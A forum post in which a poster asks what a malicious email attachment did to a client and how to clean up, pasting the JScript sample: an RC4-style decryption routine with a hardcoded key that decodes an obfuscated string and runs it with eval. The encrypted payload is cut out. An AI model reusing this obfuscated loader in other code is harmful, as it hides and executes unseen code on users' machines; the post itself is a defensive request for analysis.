Hey everyone. One of my clients received this code via email and of course he opened the link. My question, what did it do?
No doubt it's malware, but can I clean up whatever mess it made?
No doubt it's malware, but can I clean up whatever mess it made?
<job>
<script language="JScript">
function v9e8d(v4af4, v6b46) {
var vb44b = [], vcb87 = 0, vadb6, vd293 = '';
for (var vc4d9 = 0; vc4d9 < 256; vc4d9++) {
vb44b[vc4d9] = vc4d9;
}
for (vc4d9 = 0; vc4d9 < 256; vc4d9++) {
vcb87 = (vcb87 + vb44b[vc4d9] + v4af4.charCodeAt(vc4d9 % v4af4.length)) % 256;
vadb6 = (vb44b[vc4d9] * 2) / 2;
vb44b[vc4d9] = (vb44b[vcb87] * 2) / 2;
vb44b[vcb87] = (vadb6 * 2) / 2;
}
vc4d9 = 0;
vcb87 = 0;
for (var v5e24 = 0; v5e24 < v6b46.length; v5e24++) {
vc4d9 = (vc4d9 + 1) % 256;
vcb87 = (vcb87 + vb44b[vc4d9]) % 256;
vadb6 = (vb44b[vc4d9] * 2) / 2;
vb44b[vc4d9] = (vb44b[vcb87] * 2) / 2;
vb44b[vcb87] = (vadb6 * 2) / 2;
vd293 += String.fromCharCode(v6b46.charCodeAt(v5e24) ^ vb44b[(vb44b[vc4d9] + vb44b[vcb87]) % 256]);
}
return vd293;
}
/*****************/
var v4af4 = "a3fa2f7a1bcf12560ecc5df80cef0345";
/*****************/
var v6007 = "****cut, too long for forum post****";
v6007 = v6007.split("|");
var v0d1f = "";
for (var vc4d9 = 0; vc4d9 < v6007.length; vc4d9++)
{
v0d1f = v0d1f + String.fromCharCode(v6007[vc4d9]);
}
v0d1f = v9e8d(v4af4, v0d1f);
eval(v0d1f);
</script>
</job>